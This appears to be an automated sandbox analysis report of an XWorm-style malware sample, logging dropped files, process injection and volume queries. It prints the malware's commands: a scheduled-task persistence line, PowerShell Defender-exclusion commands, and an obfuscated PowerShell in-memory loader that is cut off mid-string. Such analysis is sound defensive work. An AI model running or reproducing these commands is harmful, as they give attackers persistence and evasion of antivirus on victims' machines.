Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1A0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F00000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F10000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1390000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B00000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1470000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 5C0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C50000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 910000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 5B0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EF0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EE0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: BD0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 3B0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F40000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 790000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 8C0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C50000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1210000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: BD0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: DA0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C60000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 9B0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Users\Public\DeadXClient.exe base: 1B410000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Users\Public\DeadROOTkit.exe base: 1B9F0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 13B38860000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1F080000000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1EF2F790000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 24D21B40000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2023BB50000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\schtasks.exe base: 1A8EC190000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2CCE00B0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Users\Public\Deadsvchost.exe base: 560000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Users\Public\Deadsvchost.exe base: 940000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Users\user\AppData\Local\DeadROOTkit.exe base: 11C0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E9CEF00000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E9CEF60000 Jump to behavior
Source: C:\Windows\System32\lsass.exe Memory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process created: C:\Users\Public\DeadXClient.exe "C:\Users\Public\DeadXClient.exe" Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process created: C:\Users\Public\DeadROOTkit.exe "C:\Users\Public\DeadROOTkit.exe" Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process created: C:\Users\Public\DeadCodeRootKit.exe "C:\Users\Public\DeadCodeRootKit.exe" Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe" Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe' Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DeadROOTkit.exe' Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process created: C:\Users\Public\Deadsvchost.exe "C:\Users\Public\Deadsvchost.exe" Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{7d42e50e-8059-4906-9d19-fa399c842f66} Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:bubcgltffnzz{param([outputtype([type])][parameter(position=0)][type[]]$qbdraqnalmmwja,[parameter(position=1)][type]$duqqlsyxsk)$pndjvvbnfjt=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+''+'e'+''+[char](102)+''+[char](108)+''+[char](101)+''+'c'+''+[char](116)+''+[char](101)+''+[char](100)+''+[char](68)+'e'+[char](108)+''+[char](101)+''+'g'+''+[char](97)+''+[char](116)+'e')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule('i'+'n'+''+[char](77)+''+'e'+''+[char](109)+''+'o'+''+'r'+'y'+[char](77)+'o'+[char](100)+''+[char](117)+'l'+[char](101)+'',$false).definetype(''+'m'+''+[char](121)+'de'+'l'+'e'+[char](103)+''+[char](97)+''+[char](116)+''+'e'+''+'t'+''+'y'+''+'p'+''+'e'+'',''+[char](67)+''+[char](108)+''+[char](97)+''+[char](115)+''+'s'+''+[char](44)+''+[char](80)+'u'+'b'+'l'+[char](105)+''+[char](99)+','+'s'+''+'e'+''+[char](97)+''+[char](108)+''+[char](101)+'d,a'+[char](110)+''+[char](115)+'i'+[char](67)+''+'l'+''+[char](97)+''+[char](115)+''+'s'+''+[char](44)+'au'+[char](116)+''+'o'+''+[char](67)+''+[char](108)+''+'a'+''+[char](115)+''+[char](115)+'',[multicastdelegate]);$pndjvvbnfjt.defineconstructor(''+[char](82)+''+[char](84)+'s'+[char](112)+''+'e'+''+[char](99)+''+[char](105)+''+[char](97)+''+[char](108)+''+'n'+''+[char](97)+'m'+[char](101)+''+','+''+'h'+''+[char](105)+''+'d'+''+'e'+''+[char](66)+'y'+[char](83)+'i'+'g'+''+[char](44)+''+'p'+''+[char](117)+''+[char](98)+''+'l'+''+'i'+''+[char](99)+'',[reflection.callingconventions]::standard,$qbdraqnalmmwja).setimplementationflags('r'+[char](117)+''+'n'+'t'+[char](105)+''+'m'+''+[char](101)+''+[char](44)+''+'m'+''+[char](97)+''+[char](110)+''+[char](97)+''+[char](103)+''+[char](101)+''+[char](100)+'');$pndjvvbnfjt.definemethod(''+[char](73)+''+[char](110)+''+[char](118)+''+[char](111)+''+[char](107)+''+'e'+'',''+'p'+''+[char](117)+'bl'+[char](105)+''+[char](99)+''+[char](44)+''+[char](72)+''+'i'+''+[char](100)+'e'+'b'+''+[char](121)+''+'s'+''+'i'+''+'g'+''+[char](44)+''+[char](78)+''+[char](101)+''+[char](119)+''+[char](83)+''+[char](108)+''+[char](111)+''+'t'+','+[char](86)+''+[char](105)+'r'+[char](116)+'u'+'a'+''+'l'+'',$duqqlsyxsk,$qbdraqnalmmwja).setimplementationflags(''+[char](82)+''+[char](117)+''+[char](110)+''+[char](116)+''+[char](105)+''+[char](109)+'e'+[char](44)+''+'m'+'a'+[char](110)+''+[char](97)+''+'g'+''+[char](101)+''+[char](100)+'');write-output $pndjvvbnfjt.createtype();}$rjkdrlkuxkpoh=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals('sy'+'s'+''+[char](116)+''+[char](101)+''+[char](109)+''+[char](46)+''+[char](100)+'l'+[char](108)+'')}).gettype(''+'m'+''+[char](105)+''+[char](99)+'r'+[char](111)+''+'s'+''+[char](111)+''+'f'+'t.w'+[char](105)+'n'+[char](51)+'2.'+[char](85)+''+[char](110)+'s'+[char](97)+'f
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_00000001400022FC AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 6_2_00000001400022FC
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_00000001400022FC AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 6_2_00000001400022FC
Source: DeadXClient.exe, 00000001.00000002.2955878706.0000000002956000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: DeadXClient.exe, 00000001.00000002.2955878706.0000000002956000.00000004.00000800.00020000.00000000.sdmp, dwm.exe, 00000010.00000002.3008522588.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 00000010.00000000.1784338217.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: winlogon.exe, 0000000B.00000002.2965080683.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000B.00000000.1755965306.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000010.00000002.3010521437.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 0000000B.00000002.2965080683.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000B.00000000.1755965306.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000010.00000002.3010521437.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: DeadXClient.exe, 00000001.00000002.2955878706.0000000002956000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: DeadXClient.exe, 00000001.00000002.2955878706.0000000002956000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
Source: winlogon.exe, 0000000B.00000002.2965080683.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000B.00000000.1755965306.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000010.00000002.3010521437.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: DeadXClient.exe, 00000001.00000002.2955878706.0000000002956000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager2b
Source: winlogon.exe, 0000000B.00000002.2965080683.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000B.00000000.1755965306.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000010.00000002.3010521437.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\dllhost.exe Code function: 6_3_000002E86A0715C0 cpuid 6_3_000002E86A0715C0
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Queries volume information: C:\Users\user\Desktop\mIURiU8n2P.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Queries volume information: C:\Users\Public\DeadXClient.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Queries volume information: C:\Users\Public\DeadROOTkit.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\Public\Deadsvchost.exe Queries volume information: C:\Users\Public\Deadsvchost.exe VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\System32\Tasks\DeadROOTkit VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\System32\Tasks\DeadROOTkit VolumeInformation
Source: C:\Users\Public\Deadsvchost.exe Queries volume information: C:\Users\Public\Deadsvchost.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
